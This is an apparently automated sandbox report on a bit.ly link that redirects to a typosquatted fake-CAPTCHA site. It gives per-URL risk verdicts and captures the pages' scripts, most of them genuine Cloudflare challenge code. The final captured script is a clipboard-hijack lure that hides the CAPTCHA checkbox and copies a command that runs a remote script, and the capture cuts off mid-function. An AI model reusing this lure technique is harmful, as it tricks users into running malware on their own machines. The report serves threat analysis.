URL: https://bit.ly Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": true,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://bit.ly |
URL: https://admin.extranet-recaptcha.com/confirm/login... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and multiple fallback domains further increases the risk. While the script may have a legitimate purpose, the overall behavior is highly suspicious and indicative of malicious intent."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "admin.extranet-recaptcha.com",cType: 'managed',cRay: '8fd0870f5bee43a0',cH: 'KW1n0gafFsjbZURxd1npDDQKMbI3OIpcbQmaUb3pN5E-1736049272-1.2.1.1-z4enqmbeCio3taXzy4L5sHPJvRzJZGudxFnWj4fJ9etq7S4togDKUIEWmzhwFOQu',cUPMDTk: "\/confirm\/login\/vrPhMxXT?__cf_chl_tk=25KWo_enNhlI0iB90RMLMjkILJkoiDIknYQqiEfmHLE-1736049272-1.0.1.1-HR_jRJLH1sfQ72HdhfxVWscasmrS.MoWPnKAocx_vFk",cFPWv: 'g',cITimeS: '1736049272',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/confirm\/login\/vrPhMxXT?__cf_chl_f_tk=25KWo_enNhlI0iB90RMLMjkILJkoiDIknYQqiEfmHLE-1736049272-1.0.1.1-HR_jRJLH1sfQ72HdhfxVWscasmrS.MoWPnKAocx_vFk",md: "WKRLcjU5C1YJI.s4XEHq3PZnGoDGJ_h3LQtgKK1dvsk-1736049272-1.2.1.1-8x21ZAVFhL1846mmE9xWn6_wkiPI3cZ3YzFa_Yjh3sSLE9cQ8WyvjFP5IiVDw_HEfQYXLXPj8utvzOuU12OPKRj0x_V4GqIdvkf7bEc.Ou3dY2Rl2ILfY9.7FjLdHHCrsK9zCKhS5FNNKqht9jsns.OO5zef7p0DIYuZmv8iVsgPQuTpWRYyclwgFkgxlx6U5DJs.UVtaV2wmNJ5fAaC88.JN78VVj_gogXhLA_gho.0imux12DJS4oWUY7bckrmWpKhiyfOecdZ3B9ociDZA2aoFwMpWdIW5d3oyGGLqBYYbUlNa6gzQZKBHU3yNbOsGrsueoxkvzng7yDqrG6FgyfZFFa0IW3_EGT.CtEqF6ojRV4sB.1rcZqTf7iXgdiYbfNfi7pR_QLU9GUcE.HhWQd07v1PN8wJEvuiMqjnoqwfCeVrJJDzFBbaQJa4xgaRMTSj.1mZD9K9mbX_HqB4Vn5sokv1sQN0G52MBjEVuUzrhFoIT.lLt2LbtdC5XIq7zIGcsvXllWqyMTvb7BZmE0cE7MOGrbxyZNhum2UUaW6uEEewSDMT6Oyn.JaOgsGmutHZecxUah.QHBsclomiaEG.xu6xckKh._UYxDdqBEiB8WvwsMwEFCWNFaSnxuxPVdNtyFCqntd_.JCTqtCF_g0Ou2Wxj.nzoStH_V9t4cMFy4PB2_OPiH1sobbvPccXmu91Mp0cGnYNX7WPnDEWLfakIQ35gH268ZlSMVdpo7mraFaCX2ViFw2suuFQibhpqhWFeNvYmX7cgCPikv7IwtnoRvzFGMPO4KJr0oSLaedTURIOIbdm_e3yX.7AimXhlpAeNFtmlt6Zx1Jf1Wsrw.A1X5qauiypOwOtV0Pc__e6FM6LInQN7MothXBvS4Z7NJNJgD4IzCR3FWhewJUoRiOgzPDLJv6JnibWAwViPPdsJ6lHMA4LZiuCKXBz8BDodmf3N43_n.P1sGNjGRLYO5OoRLEMoFl5QXd7bEWEtBw7lhvpoqG83NVSH7ml6Cx6zAXNxZTATqMozh.GObJlibzzoIqHg1Khh0TeoGoQoF8ci3tUZAQg1kN_57fLgZWRQvz2_3Fr3sgBAFH5yHsmqqvq02BRl0iN9NqnvPRN2QQf_VAQ68mLCOxvvf0480jpBylD72rpozmBOb8dP1RUpKOLLWvQPwnMsTtuU1Iu1HqBSTKy7_dqMYeFYaIIPkFrd0HaXJgP6SrbJKPNqXBtiDC66g3ttvFT4WweLVs77kRq7QbPBLAtapRvYZ.vPg2Q7IFGxrQFWk6oBeyW35fIEcufOVj_TKt2OfJah_XWsQga0H6RUu1VbzNFEWL1C2e3hjk.PSnEmEz.iV4.soWx.scLx7B3Oc50U6Ly2RPDF1VSZHtQ8LgLrjIvEwNexUmnOYFo4_wTKjxcvGSpGaSi0guCjkDV7S_b8fTQFCdN2geMh29czhYmx3HB47F3Sy5qT3mvzslNSmCN8L.w.Int5uj16zWIjetZ6HFJ7yj38Y5ecdxyOHN1pmA9PlAEYQ45jvyFHZyDgRRLOeemyXUsnosSRKcwq_at2l0d2.omny3dNpZpI5SceJeVHIWeAJvrza1MD57492BSvAMUxm2B.EhfSWiUn1M6hDe4dq0jQjrMs.M3Xi3H1yDZxF1tDz1jm3xJJJCjX7tDdMZmJcqZpc3VDd7EjhV10zgW3OEn0ybOp5YRrPyhof5fx1pzORaM07gPlR8DRdIWQqKA0nRmjJvTNNaG6NgGcduwNIvxYBE8itF9gk5cnnK6lDpM18DDD_qLCxTtERGEm8qkdxYHGGYVro6txe3P_FQcee6UjopPeGKeW6KN7VZlu4ewbZAKmI99GSxb_UEdwLwvI9f.UlPR7_1bIVd_pMXiVV2cSsJEIdt2TI3PV4CaA5r9hTs5R1.rzWGiEzp9xPg5wSJZuv_8XjRljALuy07UA9UL28fmopY0vKiLZDEQrczg.0hu3ywOWPWIeC8Uuu0MlTTcgcNzjiS7TlnrmuqRWcxGmCGet.hTBQ7ykwEIY8ah.L275TOhw_Fetoa4ivLz6gqe2qI29ig_J7FVCT_zOOv_xyYYokU_SJ8Vkw3AdOisckPzpNNrL7G3KzraeuRtniQOFygjYkyorx5cF7X64HBqK8EW2Fh.pZ6ZEeo28n11AgWnoRMKrveTCZFnLPZZ9g9oANjSVPp3ShNkPNCHRPlCZVMYOmiJf7cDD56UIgmi2TN3tuFUjAT6Z2N73qKSNCakrp9qZAo2Lnvw6ir8uYMsxLwTZX.zhdatN6PlcyBGNbQwOkhn0GNnEh3e8svWpPgLRFwRUOi7n16sIMFkqkZstqvjWPYUW2b2Qh4y6O03VHx8bjcyMlwvBnNLrKmz.LjKLoXB25zrEmiekPePRbz.5RtgBsuskTBBSeYZoxrhAoSaonYvrviRylN7UgbY_yrOnv8PdoDYBJWSQXsX_bK8ZrWUSeEKncsfunsZRvJB6EhbxQ8ahfNCIELvv53lL8uUpysMOiKWqjNXn3OTUdr6dpRMvnowWX_mlWpvjsD5JSI28dI1Kf0SOhTaxVtB4xKhwHXOKJyMyvQnvxruLda.MNoT8E0hCKhFTpAEhrtiWl63vNQle6KjmTUPiEQyahPCuQ",mdrd: "P0dorEYIfRmGItSZiKbedGnfe3qxnARsIlKvwwLsakA-1736049272-1.2.1.1-KaaF0CNJPanplwfs_foszAhAiJIm0PBhetk.5sy2glHy.WnEJRNCqznpPvoGhx0yoPwIcsGEVb4QWFSB6fcDfihtG7q4sb851xhLXLW1wueU2ngSJiT.zAQHGQlMV7oIxJkvtNV7NQp64l4kJMRhg6m5RVYk0tqGTpFOoDHnHWQPozRGFzZ_x5E1bZGokf6Zmj1mVmCZjnHdDzjohqMUhi_Q1LS0AMzFmgJNui6q9og4TKuZrxEcWp1oQDuMw4GFw83TXjb4OsiIAIHok6vhdWrNH9WUEDNAf0eHpq.HgNbujN7.JxzcOx1RS5wC3UFomak2h1eFm2BfmFrRJ_FiN.TVxq9t0zk9RziNSqvY1wNfRMccfMROiihQBuxut13BM.DfNLXGKOlJ41cCPJXP8K8bfIuTCptnrOB2XG2E3zSLdms_lQS87eXTlXku7vOQi7CfF6RMkf9s4rI1FOwkNPGBiev9r0UOWlWdbTJzsB7MAV82xteKIzGXyV09QFEiuW0xuPjeK1_LT9X7zoabtj7CJEgisTzIX |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles the Cloudflare challenge process, which includes translations, polyfills, and event handling. While the script uses some legacy APIs like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, the script seems to be a legitimate part of Cloudflare's security measures and does not pose a significant security risk."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"testing_only_always_pass":"Testing%20only%2C%20always%20pass.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_timeout":"Timed%20out","testing_only":"Testing%20only.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_failure":"Error","turnstile_verifying":"Verifying...","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_footer_terms":"Terms","turnstile_feedback_description":"Send%20Feedback","turnstile_refresh":"Refresh","turnstile_footer_privacy":"Privacy","turnstile_expired":"Expired","turnstile_success":"Success%21","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_overrun_description":"Stuck%20here%3F","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_feedback_report":"Having%20trouble%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","human_button_text":"Verify%20you%20are%20human"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fn,ft,fw,fy,fz,fA,fM,fY,g4,g5,g6,gg,gr,gv,gz,gA,gB,gF,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1177))/1*(-parseInt(gI(1618))/2)+-parseInt(gI(1811))/3+-parseInt(gI(1752))/4*(-parseInt(gI(1452))/5)+parseInt(gI(793))/6+parseInt(gI(1447))/7+-parseInt(gI(1100))/8*(parseInt(gI(542))/9)+-parseInt(gI(1431))/10,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,117484),eM=this||self,eN=eM[gJ(1259)],eO=[],eP=0;256>eP;eO[eP]=String[gJ(711)](eP),eP++);gH=(eQ=(0,eval)(gJ(1437)),eR=atob(gJ(1393)),eM[gJ(1455)]=![],eM[gJ(1355)]=function(hz){if(hz=gJ,eM[hz(1455)])return;eM[hz(1455)]=!![]},fn=0,eN[gJ(1449)]===gJ(1385)?eN[gJ(1409)](gJ(600),function(){setTimeout(fq,0)}):setTimeout(fq,0),eM[gJ(1092)]=function(hJ,d,e,f,g){hJ=gJ,d={},d[hJ(529)]=function(h,i){return h*i},d[hJ(571)]=function(h,i){return h<<i},e=d,f=1,g=e[hJ(529)](1e3,eM[hJ(1250)][hJ(586)](e[hJ(571)](2,f),32)),eM[hJ(709)](function(hK){hK=hJ,eM[hK(1401)]&&(eM[hK(1682)][hK(820)](),eM[hK(1682)][hK(1802)](),eM[hK(1680)]=!![],eM[hK(1401)][hK(1594)]({'source':hK(1608),'widgetId':eM[hK(1069)][hK(862)],'event':hK(1846),'cfChlOut':eM[hK(1069)][hK(1413)],'cfChlOutS':eM[hK(1069)][hK(869)],'code':hK(874),'rcV':eM[hK(1069)][hK(1638)]},'*'))},g)},eM[gJ(1556)]=function(g,h,i,hL,j,k,l,m,n,o,s,x,B,C,D,E,F,G,H){k=(hL=gJ,j={},j[hL(1528)]=hL(708),j[hL(1195)]=function(I,J){return I+J},j[hL(1570)]=function(I,J){return I+J},j[hL(1211)]=function(I,J){return I+J},j[hL(717)]=hL(1649),j[hL(1081)]=hL(1458),j);try{for(l=hL(1460)[hL(1057)]('|'),m=0;!![];){switch(l[m++]){case'0':n=gz[hL(1072)](H)[hL(1155)]('+',hL(822));continue;case'1': |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate behavior for websites that use Cloudflare's security services. The script sets up various configuration options for the Cloudflare challenge and includes event handlers for communication between the script and the parent window. While the script uses some techniques like message passing and dynamic configuration, these are common practices for Cloudflare's challenge system and do not indicate any malicious intent. Therefore, the overall risk score is low."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'e6pww',
chlApiSitekey: '0x4AAAAAAADnPIDROrmt1Wwj',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'wntUhhEUKRa9Naq_nm1I1qjKmMwEGhyjy74xdiW5x34-1736049275-1.3.1.1-iRw5HrqUS.Qb8uLUBJXvcwXOcD4W9vImn.xvYkDGOis',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fd0872309c74316',
cH: 'vdcpwwLtpsXX3cO2l4Sxq4MbDmCsZr65rvrhdEZL5uk-1736049275-1.1.1.1-fDASs8XBDcHZ8wAoaNziiE2FM36UMyEOvgyNA19Lg.qPkc9mcaOumQQZJw0jHOeL',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'yGDkRULI8.K8f17tHhUwLHF2sDRtn8b4gAJDIk1c.oY-1736049275-1.1.1.1-1Q.qlulKbBn5nakJHiCxZ.hgLClc9cF5vrR7_fBQZWx4KaDHV10eLwXi1Xmbbblg7e1exFu_oODDfceIqT8UKb75T2xvDKQ4Jn7x4cPs3GoziJDMVO7ldce1iZqRsm0GsZfxAVbUjRjY8vXB2rjX1wdDI0k.zw3z1wN_wTZqLln1Ly9BZJGkLx.d6v16jIna7T193FwLEtCnVfJlF7vL7X3j0DL.V8LaDUwKIh717H0itKIgzzT5T8rfIqclcDZ9PMmIRO7J6henmL1OU.8mTOyB3ffGTFz5hfCZ7vjb5VT2RLpKAOJ2iSMbD0ZR8cS7aKbmye9AFHclTUWS4xTydFU33TyXu6WrOfcQPS0hNwiM1JjyZ363uVd2SNGjF5krIP414XqnXZ_w8VJLufWcUDPqgTjn96fm5shF07ETc3SA9GNmM_jUicHEjrobQEY9q6eUbYVbQTD.BEyDPJiv0s.k4iX4yNgW4qnjNrXAf7BOx5ysH0vlvKOir2YUDCUgl396XtjjYW5InJNL4Kxn69bi8NZhv3oejviZkfhPiYG.G02ksoeim.8erRJNyetuUZVEViSEyOw.TaAs9fOMEB7K5jHEQMGTX5zHX.C5A3fVZvL4outytCjxdkEnLfCJTNt1u2Y3Lu6L5xjXn625ATuKNwFEMzzF0Ah29A4ND4eS7QuEVteUjUqNxRBn0CVbS27jph7WlaKrU7KikpXQrWVuOWlkJH01IzJTNY5m4Gd95LFFaWP1hAzAhXvsbAksMWFRjQvqhY_2i.O6wX3ZvYXwjV6y68mVnYlfmTY1F3Gc.kLfjlLP8SWR_lVxL5iq3lBeTcnEiCEyOGzT4mdhKR11Jgn.P4jI2JrFhrMDPtUZwHPR0iBFWZrCoKqL3gig2YhjqsNo.5RvKvw14Fxgvtm6grHPpfzzzepbXpIhAJcHx7lT7ZMAVAw_3DGhJtWrLyjVJ9O1QcGj4sgRMqfMKRlLwYu7o6rEROWfhXcL6jlRCsbUliB0CPDPb1iI0oBVnQXuU5OPMUL8kw90_q6YZ9.i54AjWZYBRlkTu3o1ULKZdOjcLG8zK4JnKAX_hsG2MOnwYcnuB0dDF7sCngQBV2RumCopfxAPtBkbd0mPwcrYqZqI_4okRkDMKOw66JFzoJyBoL6Za5HpsQgA_HNCQCvsOOmNKi_qlWhV7OjdFczPYn1YSOF4f4FnFR30JR.S4OFccKcelZhPa7YqbP41wtljrE.5ODgbpD022jEpNLZci7G1Ipjcj03ld19OViiwRPg4Qa4k8tdBZUfwWqMgvZvZtvYtsUQlKWR3BFpwrUycpqSEy1uqHM4Fk5pWQk37Pjuhtp8KB3cfOJZG3YYZDIBCZTqz2bEyfbPNySDEV3Y',
cITimeS: '1736049275',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'e6pww',
nextRcV: 'wntUhhEUKRa9Naq_nm1I1qjKmMwEGhyjy74xdiW5x34-1736049275-1.3.1.1-iRw5HrqUS.Qb8uLUBJXvcwXOcD4W9vImn.xvYkDGOis',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://admin.extranet-recaptcha.com/confirm/login/vrPhMxXT Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://admin.extranet-recaptcha.com Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://admin.extranet-recaptcha.com |
URL: https://admin.extranet-recaptcha.com/confirm/login/vrPhMxXT Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://admin.extranet-recaptcha.com/confirm/login/vrPhMxXT Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://admin.extranet-recaptcha.com/confirm/login/vrPhMxXT Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Verify you are human",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be related to Cloudflare's challenge system, which is a legitimate security mechanism. While it uses some legacy APIs and has some obfuscated elements, the overall behavior is consistent with Cloudflare's services and does not demonstrate any clear malicious intent. The risk score is low, as this is likely a benign script with some outdated practices."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'e6pww',
chlApiSitekey: '0x4AAAAAAADnPIDROrmt1Wwj',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'wntUhhEUKRa9Naq_nm1I1qjKmMwEGhyjy74xdiW5x34-1736049275-1.3.1.1-iRw5HrqUS.Qb8uLUBJXvcwXOcD4W9vImn.xvYkDGOis',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fd0872309c74316',
cH: 'vdcpwwLtpsXX3cO2l4Sxq4MbDmCsZr65rvrhdEZL5uk-1736049275-1.1.1.1-fDASs8XBDcHZ8wAoaNziiE2FM36UMyEOvgyNA19Lg.qPkc9mcaOumQQZJw0jHOeL',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'yGDkRULI8.K8f17tHhUwLHF2sDRtn8b4gAJDIk1c.oY-1736049275-1.1.1.1-1Q.qlulKbBn5nakJHiCxZ.hgLClc9cF5vrR7_fBQZWx4KaDHV10eLwXi1Xmbbblg7e1exFu_oODDfceIqT8UKb75T2xvDKQ4Jn7x4cPs3GoziJDMVO7ldce1iZqRsm0GsZfxAVbUjRjY8vXB2rjX1wdDI0k.zw3z1wN_wTZqLln1Ly9BZJGkLx.d6v16jIna7T193FwLEtCnVfJlF7vL7X3j0DL.V8LaDUwKIh717H0itKIgzzT5T8rfIqclcDZ9PMmIRO7J6henmL1OU.8mTOyB3ffGTFz5hfCZ7vjb5VT2RLpKAOJ2iSMbD0ZR8cS7aKbmye9AFHclTUWS4xTydFU33TyXu6WrOfcQPS0hNwiM1JjyZ363uVd2SNGjF5krIP414XqnXZ_w8VJLufWcUDPqgTjn96fm5shF07ETc3SA9GNmM_jUicHEjrobQEY9q6eUbYVbQTD.BEyDPJiv0s.k4iX4yNgW4qnjNrXAf7BOx5ysH0vlvKOir2YUDCUgl396XtjjYW5InJNL4Kxn69bi8NZhv3oejviZkfhPiYG.G02ksoeim.8erRJNyetuUZVEViSEyOw.TaAs9fOMEB7K5jHEQMGTX5zHX.C5A3fVZvL4outytCjxdkEnLfCJTNt1u2Y3Lu6L5xjXn625ATuKNwFEMzzF0Ah29A4ND4eS7QuEVteUjUqNxRBn0CVbS27jph7WlaKrU7KikpXQrWVuOWlkJH01IzJ
|
URL: https://admin.extranet-recaptcha.com/confirm/login/vrPhMxXT Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://challenges.cloudflare.com/turnstile/v0/g/8... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. It appears to be a utility script with functions for handling promises, object manipulation, and error descriptions. There are no interactions with external domains or aggressive DOM manipulations. The code is not obfuscated, and there are no legacy practices or tracking behaviors present."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://admin.extranet-recaptcha.com/confirm/login/vrPhMxXT Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://admin.extranet-recaptcha.com/confirm/login... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a simple feature detection script that checks if the user is accessing the site from a mobile device. It hides a CAPTCHA container for mobile users and displays a message asking them to visit the site from a computer. This behavior is common for websites that want to provide a different user experience for mobile and desktop users, and it does not exhibit any high-risk indicators."
} |
function isMobileDevice() {
return /iPhone|iPad|Android|BlackBerry|IEMobile|Opera Mini|webOS/i.test(navigator.userAgent);
}
function init() {
if (isMobileDevice()) {
document.getElementById('captcha-container').style.display = 'none';
document.getElementById('message').innerText = 'Please visit the site with your computer.';
} else {
document.getElementById('captcha-container').style.display = 'block';
}
}
window.onload = init;
|
URL: https://admin.extranet-recaptcha.com/confirm/login... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The script hides a reCAPTCHA checkbox, modifies the DOM, and then copies a command to the clipboard that attempts to execute a remote script. This behavior is highly suspicious and indicative of malicious intent, warranting a high-risk score."
} |
function setClipboardCopyData(textToCopy) {
const decodedText = textToCopy.replace(/'/g, "'").replace(/"/g, '"');
const tempTextArea = document.createElement("textarea");
tempTextArea.value = decodedText;
document.body.append(tempTextArea);
tempTextArea.select();
document.execCommand("copy");
document.body.removeChild(tempTextArea);
}
function someEdit() {
document.getElementsByClassName('recaptcha-checkbox')[0].style.display = 'none';
